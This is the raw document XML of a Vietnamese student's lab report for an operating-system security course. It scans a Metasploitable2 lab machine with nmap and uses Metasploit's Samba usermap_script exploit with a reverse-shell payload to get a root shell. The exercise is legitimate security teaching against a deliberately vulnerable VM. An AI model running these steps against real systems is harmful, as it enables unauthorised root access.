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AF3E6" w14:textId="402ADC49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D53A4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Báo cáo thực hành môn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D53A4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toàn hệ điều hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AABB65D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D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài thực hành 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087FF8B6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0751950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758D893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6792FF5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2319874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3B27ACD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11DCA16" w14:textId="77777777" w:rsidR="00363750" w:rsidRPr="005D53A4" w:rsidRDefault="00363750" w:rsidP="0036375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EDE8FFF" w14:textId="77777777" w:rsidR="00363750" w:rsidRPr="005D53A4" w:rsidRDefault="00363750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D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Họ và tên: Hoàng Trung Kiên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE9C63" w14:textId="06DEC6C3" w:rsidR="00D66EB4" w:rsidRPr="005D53A4" w:rsidRDefault="00363750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D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mã sinh viên: B20DCAT098</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BC82F" w14:textId="46BB8665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31FA9EF" w14:textId="10C6F61E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BDC8A88" w14:textId="16BB4EA3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AC484C7" w14:textId="50269DA9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47B2E4A" w14:textId="34ABBB2E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B389593" w14:textId="04CEF548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2A48C92" w14:textId="4DB18678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E8083BC" w14:textId="134A8A7B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DAF5997" w14:textId="3B0CC594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404A2CB" w14:textId="70E63264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A280EDA" w14:textId="38068BB5" w:rsidR="00882E71" w:rsidRPr="005D53A4" w:rsidRDefault="00882E71" w:rsidP="00363750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E2A791D" w14:textId="77777777" w:rsidR="002048D7" w:rsidRPr="005D53A4" w:rsidRDefault="002048D7" w:rsidP="00B6274D">
      <w:pPr>
        <w:ind w:left="1134" w:firstLine="850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8DC49AD" w14:textId="66DF0B33" w:rsidR="00882E71" w:rsidRPr="005D53A4" w:rsidRDefault="00453F16" w:rsidP="00B6274D">
      <w:pPr>
        <w:ind w:left="-284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5D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hà nội, ngày 14 tháng 3 năm 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787E548F" w14:textId="4C87982E" w:rsidR="00882E71" w:rsidRPr="005D53A4" w:rsidRDefault="00882E71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lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cài đặt các công cụ, nền tảng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2D1A00" w14:textId="77777777" w:rsidR="00882E71" w:rsidRPr="005D53A4" w:rsidRDefault="00882E71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-Đổi tên hostname: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E603D1" w14:textId="04212E81" w:rsidR="00882E71" w:rsidRPr="005D53A4" w:rsidRDefault="00882E71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+Máy attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0801CCBB" w14:textId="3837B35F" w:rsidR="00672963" w:rsidRPr="005D53A4" w:rsidRDefault="00672963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7576414E" wp14:editId="2171E8F8">
            <wp:extent cx="5731510" cy="1670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1C60" w14:textId="56898B60" w:rsidR="00672963" w:rsidRPr="005D53A4" w:rsidRDefault="00672963" w:rsidP="00443D8C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-426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+Máy victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64359439" w14:textId="1AF7A437" w:rsidR="00882E71" w:rsidRPr="005D53A4" w:rsidRDefault="00672963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38128806" wp14:editId="387EAA0F">
            <wp:extent cx="5731510" cy="1042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9CB0" w14:textId="77777777" w:rsidR="00672963" w:rsidRPr="005D53A4" w:rsidRDefault="00672963" w:rsidP="00565F2F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-426" w:firstLine="142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2. Địa chỉ IP máy Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29638DDA" w14:textId="526DBE47" w:rsidR="00672963" w:rsidRPr="005D53A4" w:rsidRDefault="00672963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Địa chỉ ip máy attacker: 192.168.100.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F937AC" w14:textId="3F2E467B" w:rsidR="00672963" w:rsidRPr="005D53A4" w:rsidRDefault="00672963" w:rsidP="00443D8C">
      <w:pPr>
        <w:spacing w:after="0"/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5B2E9F52" wp14:editId="3C900745">
            <wp:extent cx="5731510" cy="1736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3830" w14:textId="30950445" w:rsidR="0015721E" w:rsidRPr="005D53A4" w:rsidRDefault="0015721E" w:rsidP="00443D8C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-426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3. Đ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ịa chỉ IP máy Metasploitable2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D52BEEA" w14:textId="6CC68BDF" w:rsidR="0015721E" w:rsidRPr="005D53A4" w:rsidRDefault="0015721E" w:rsidP="00443D8C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-426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Địa</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỉ ip máy Victim: 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192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00443D8C" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3816905E" w14:textId="2F7F8FB2" w:rsidR="00443D8C" w:rsidRPr="005D53A4" w:rsidRDefault="00443D8C" w:rsidP="00443D8C">
      <w:pPr>
        <w:ind w:left="-426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BB8668C" wp14:editId="267D8FA9">
            <wp:extent cx="5731510" cy="2427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6385" w14:textId="5835C5FD" w:rsidR="00A03D80" w:rsidRPr="005D53A4" w:rsidRDefault="008A4745" w:rsidP="00A03D80">
      <w:pPr>
        <w:ind w:left="-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4. </w:t>
      </w:r>
      <w:r w:rsidR="00884627" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tạo một người dùng mới trên máy</w:t>
      </w:r>
      <w:r w:rsidR="00884627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Meta</w:t>
      </w:r>
      <w:r w:rsidR="00A03D80" w:rsidRPr="005D53A4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F0AF4AF" w14:textId="7886E5A2" w:rsidR="00A03D80" w:rsidRPr="005D53A4" w:rsidRDefault="00A03D80" w:rsidP="00A03D80">
      <w:pPr>
        <w:ind w:left="-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Tài khoản là: kienht098</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24683E" w14:textId="370ED1C8" w:rsidR="00A03D80" w:rsidRPr="005D53A4" w:rsidRDefault="00A03D80" w:rsidP="00A03D80">
      <w:pPr>
        <w:ind w:left="-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lastRenderedPageBreak/>
        <w:t>mật khẩu đơn giản và ngắn để có thể crack được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C513677" w14:textId="52EECA7C" w:rsidR="00A03D80" w:rsidRPr="005D53A4" w:rsidRDefault="00A03D80" w:rsidP="00882E71">
      <w:pPr>
        <w:ind w:left="-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78676CDB" wp14:editId="1385A37B">
            <wp:extent cx="5731510" cy="1574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7C9" w14:textId="2245EC90" w:rsidR="00D37A90" w:rsidRPr="005D53A4" w:rsidRDefault="008A4745" w:rsidP="00423E46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5.</w:t>
      </w:r>
      <w:r w:rsidR="00863593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63593" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Quét máy victim Metasploitable2 tìm các lỗ hổng tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F911B77" w14:textId="654D8E07" w:rsidR="00423E46" w:rsidRPr="005D53A4" w:rsidRDefault="00423E46" w:rsidP="00423E46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Kiểm tra kết nối mạng giữa các máy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBA4B28" w14:textId="77777777" w:rsidR="0027553A" w:rsidRPr="005D53A4" w:rsidRDefault="0027553A" w:rsidP="005D53A4">
      <w:pPr>
        <w:ind w:left="-426" w:firstLine="142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-Máy victim ping đến máy attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1FCD8" w14:textId="77777777" w:rsidR="0027553A" w:rsidRPr="005D53A4" w:rsidRDefault="0027553A" w:rsidP="005D53A4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+Kiểm tra kết nối từ máy victim đến máy attacker: ping (victim -&gt; attacker)—--&gt; 0% packet loss —---&gt; có thể kết nối từ máy victim tới máy attacker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E8406" w14:textId="7E56517E" w:rsidR="0027553A" w:rsidRPr="005D53A4" w:rsidRDefault="00835F4C" w:rsidP="0027553A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FF50EBD" wp14:editId="1C748C2D">
            <wp:extent cx="5731510" cy="2038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233A" w14:textId="77777777" w:rsidR="00835F4C" w:rsidRPr="005D53A4" w:rsidRDefault="00835F4C" w:rsidP="005D53A4">
      <w:pPr>
        <w:ind w:left="-426" w:firstLine="142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-Máy attacker ping đến máy victim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50814C47" w14:textId="42E9BBDA" w:rsidR="00835F4C" w:rsidRPr="005D53A4" w:rsidRDefault="00835F4C" w:rsidP="00835F4C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+Kiểm tra kết nối từ máy attacker đến máy victim: ping (attacker -&gt; victim)—--&gt; 0% packet loss —---&gt; có thể kết nối từ máy attacker tới máy victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD8796F" w14:textId="3C0FAFBD" w:rsidR="00835F4C" w:rsidRPr="005D53A4" w:rsidRDefault="00835F4C" w:rsidP="00835F4C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6C49AEAB" wp14:editId="2D26F777">
            <wp:extent cx="5731510" cy="1483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A86C" w14:textId="5FAB0B01" w:rsidR="00417F95" w:rsidRPr="005D53A4" w:rsidRDefault="00417F95" w:rsidP="00835F4C">
      <w:pPr>
        <w:ind w:left="-284"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD2020D" w14:textId="5C7CF187" w:rsidR="00417F95" w:rsidRPr="005D53A4" w:rsidRDefault="00417F95" w:rsidP="00835F4C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-</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sử dụng công cụ nmap để rà quét các lỗ hổng tồn tại trên máy chạy Metasploitable2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD8EBD" w14:textId="77777777" w:rsidR="001C75C5" w:rsidRPr="005D53A4" w:rsidRDefault="001C75C5" w:rsidP="00835F4C">
      <w:pPr>
        <w:ind w:left="-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Quét cổng dịch vụ netbios-ssn cổng 139: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F24994" w14:textId="000522B3" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="001C75C5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nmap --script vuln -p139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&lt;ip máy victim&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF49F4D" w14:textId="6010E30D" w:rsidR="00790D7C" w:rsidRPr="005D53A4" w:rsidRDefault="00790D7C" w:rsidP="001C75C5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E9F50EE" wp14:editId="6FFA0B9C">
            <wp:extent cx="5731510" cy="1598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67E0" w14:textId="77777777" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="0069514B" w:rsidP="001C75C5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Quét cổng dịch vụ microsoft-ds cổng 445: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E34225" w14:textId="3FE5FB8F" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="0069514B" w:rsidP="001C75C5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nmap --script vuln -p445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&lt;ip máy victim&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F07FED" w14:textId="4C6A67EC" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="0069514B" w:rsidP="001C75C5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78D46F57" wp14:editId="05B6AF29">
            <wp:extent cx="5731510" cy="1416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FFB6" w14:textId="12BFF99F" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="0069514B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Quét toàn bộ các cổng dịch vụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7F5F1" w14:textId="21521929" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="0069514B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D095236" wp14:editId="76B44A31">
            <wp:extent cx="5731510" cy="6584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0592" w14:textId="46ACAC60" w:rsidR="003C3C34" w:rsidRPr="005D53A4" w:rsidRDefault="00040A10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D</w:t>
      </w:r>
      <w:r w:rsidR="003C3C34" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ịch vụ đang chạy</w:t>
      </w:r>
      <w:r w:rsidR="00CE3162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trên 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2 cổng</w:t>
      </w:r>
      <w:r w:rsidR="00CE3162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139 và 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552F0D41" w14:textId="7D8F2791" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="0069514B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65FD68A0" wp14:editId="6FB1CADA">
            <wp:extent cx="5731510" cy="2096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57FE" w14:textId="048118A2" w:rsidR="0069514B" w:rsidRDefault="0069514B" w:rsidP="005D53A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79AAB48" w14:textId="77777777" w:rsidR="005D53A4" w:rsidRPr="005D53A4" w:rsidRDefault="005D53A4" w:rsidP="005D53A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F204CB9" w14:textId="5857894D" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="0069514B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6. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khai thác tìm phiên bản Samba đang hoạt động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B3BB2" w14:textId="5C245401" w:rsidR="0069514B" w:rsidRPr="005D53A4" w:rsidRDefault="0069514B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-</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khởi động Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B79E80" w14:textId="3D8810D4" w:rsidR="003C3C34" w:rsidRPr="005D53A4" w:rsidRDefault="003C3C34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BB95BC9" wp14:editId="07E618CD">
            <wp:extent cx="5731510" cy="2364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62DE" w14:textId="5EDB03CD" w:rsidR="00040A10" w:rsidRPr="005D53A4" w:rsidRDefault="00040A10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Khai báo sử dụng mô đun tấn công: use auxiliary/scanner/smb/smb_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493D44B1" w14:textId="6D915DA2" w:rsidR="00040A10" w:rsidRPr="005D53A4" w:rsidRDefault="00040A10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3659634D" wp14:editId="721227A6">
            <wp:extent cx="5731510" cy="1043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0C01" w14:textId="2F71B1F0" w:rsidR="00040A10" w:rsidRPr="005D53A4" w:rsidRDefault="00040A10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Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3120B9" w14:textId="376C2096" w:rsidR="00040A10" w:rsidRPr="005D53A4" w:rsidRDefault="00040A10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35B006A8" wp14:editId="66E80193">
            <wp:extent cx="5731510" cy="2338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771" w14:textId="4AA85251" w:rsidR="00AF5ACD" w:rsidRPr="005D53A4" w:rsidRDefault="00AF5ACD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RHOSTS là máy victim</w:t>
      </w:r>
      <w:r w:rsidR="00B1075F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(Meta</w:t>
      </w:r>
      <w:r w:rsidR="00ED6CEB" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sploitable</w:t>
      </w:r>
      <w:r w:rsidR="00B1075F" w:rsidRPr="005D53A4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4BEF4A17" w14:textId="64BEDC12" w:rsidR="00AF5ACD" w:rsidRPr="005D53A4" w:rsidRDefault="00AF5ACD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LHOSTS là máy attack</w:t>
      </w:r>
      <w:r w:rsidR="00B1075F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(Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="00164D26" w:rsidRPr="005D53A4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09228F97" w14:textId="5D8CD820" w:rsidR="00C20CF3" w:rsidRPr="005D53A4" w:rsidRDefault="008C76E1" w:rsidP="00C20CF3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Đặt địa chỉ IP máy victim: set RHOST</w:t>
      </w:r>
      <w:r w:rsidR="00C20CF3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&lt;ip máy victim&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EB0088" w14:textId="5C871A6A" w:rsidR="00C20CF3" w:rsidRPr="005D53A4" w:rsidRDefault="00C20CF3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Thực thi tấn công: run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D36AA" w14:textId="5D211470" w:rsidR="00C20CF3" w:rsidRPr="005D53A4" w:rsidRDefault="00243AE1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7F0551" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;D</w:t>
      </w:r>
      <w:r w:rsidR="00C20CF3" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ịch vụ Samba và phiên bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6822AF" w14:textId="5408FB8B" w:rsidR="00C20CF3" w:rsidRPr="005D53A4" w:rsidRDefault="00C20CF3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663FBB22" wp14:editId="7F3343B7">
            <wp:extent cx="5731510" cy="889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D876" w14:textId="413CB0F1" w:rsidR="00986334" w:rsidRPr="005D53A4" w:rsidRDefault="00986334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lastRenderedPageBreak/>
        <w:t>Gõ lệnh: exit để thoát</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B024900" w14:textId="732E0BD1" w:rsidR="00666C04" w:rsidRPr="005D53A4" w:rsidRDefault="00B27302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6. </w:t>
      </w:r>
      <w:r w:rsidR="00CC22AE" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488835A1" w14:textId="22288345" w:rsidR="00765E3F" w:rsidRPr="005D53A4" w:rsidRDefault="00765E3F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Khởi động Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385EECD0" w14:textId="77777777" w:rsidR="00A40A48" w:rsidRPr="005D53A4" w:rsidRDefault="00E60F52" w:rsidP="00A40A48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4B8BDF5" wp14:editId="3DE085A1">
            <wp:extent cx="5731510" cy="3528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48" w:rsidRPr="005D53A4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4905DF0" w14:textId="0AAEB77E" w:rsidR="00A40A48" w:rsidRPr="005D53A4" w:rsidRDefault="00A40A48" w:rsidP="00A40A48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Khai báo sử dụng mô đun tấn công: use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E44F675" w14:textId="22C23C0F" w:rsidR="00A40A48" w:rsidRPr="005D53A4" w:rsidRDefault="00A40A48" w:rsidP="00A40A48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035ACDDC" wp14:editId="7AB4F241">
            <wp:extent cx="5731510" cy="1211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479" w14:textId="3DCC2A6C" w:rsidR="00527023" w:rsidRPr="005D53A4" w:rsidRDefault="00527023" w:rsidP="00A40A48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Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụn</w:t>
      </w:r>
      <w:r w:rsidR="00FE04A8" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF0502" w14:textId="28D5D74E" w:rsidR="00527023" w:rsidRPr="005D53A4" w:rsidRDefault="00527023" w:rsidP="00A40A48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2EB18E40" wp14:editId="40B2B478">
            <wp:extent cx="5731510" cy="2823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F4D7" w14:textId="5143EAA6" w:rsidR="00950098" w:rsidRPr="005D53A4" w:rsidRDefault="003D6BD0" w:rsidP="001D2B8E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lastRenderedPageBreak/>
        <w:t>Đặt địa chỉ IP máy victim: set RHOST &lt;ip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máy </w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidR="001D2B8E" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32538294" w14:textId="358DD4F2" w:rsidR="00A52326" w:rsidRPr="005D53A4" w:rsidRDefault="00A52326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Đặt 445 là cổng truy cập máy victim: set RPORT 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F1E4F" w14:textId="57E661C2" w:rsidR="001D2B8E" w:rsidRPr="005D53A4" w:rsidRDefault="00676A93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Chọn payload cho thực thi (mở shell): msf &gt; set payload cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4128CB" w14:textId="42696555" w:rsidR="002F2FC5" w:rsidRPr="005D53A4" w:rsidRDefault="002F2FC5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A45B104" wp14:editId="2B7FC412">
            <wp:extent cx="5731510" cy="3886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37E8" w14:textId="2560B48D" w:rsidR="001D1FD2" w:rsidRPr="005D53A4" w:rsidRDefault="001D1FD2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Chạy lệnh “show options” để xem các thông tin về thiết lập tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB45E4" w14:textId="160802B0" w:rsidR="001D1FD2" w:rsidRPr="005D53A4" w:rsidRDefault="001D1FD2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+Đã đặt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RHOST  và</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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RPOST thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F39A1" w14:textId="59254FC4" w:rsidR="001D1FD2" w:rsidRPr="005D53A4" w:rsidRDefault="001D1FD2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22A2266" wp14:editId="7F52030E">
            <wp:extent cx="5731510" cy="2460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8EF" w14:textId="6A856469" w:rsidR="0027208C" w:rsidRPr="005D53A4" w:rsidRDefault="0027208C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Thực thi tấn công: exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F2F35C" w14:textId="77777777" w:rsidR="00296362" w:rsidRPr="005D53A4" w:rsidRDefault="00B04D94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="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cửa hậu mở shell với người dùng root cho phép chạy lệnh từ máy Kali </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A69F094" w14:textId="61BA0231" w:rsidR="00B04D94" w:rsidRPr="005D53A4" w:rsidRDefault="00B04D94" w:rsidP="0069514B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="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể thực hiện bất cứ lệnh shell nào trên máy victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442371D" w14:textId="77777777" w:rsidR="00D3762F" w:rsidRPr="005D53A4" w:rsidRDefault="00E35BAB" w:rsidP="0069514B">
      <w:pPr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Chạy các lệnh để đọc tên người dùng và máy đang truy cập: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0105465F" w14:textId="5F38D154" w:rsidR="001D1FD2" w:rsidRPr="005D53A4" w:rsidRDefault="006B40DF" w:rsidP="00D3762F">
      <w:pPr>
        <w:ind w:left="-284" w:firstLine="100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lastRenderedPageBreak/>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00E35BAB" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hoami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, id, </w:t>
      </w:r>
      <w:r w:rsidR="00E35BAB" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
    </w:p>
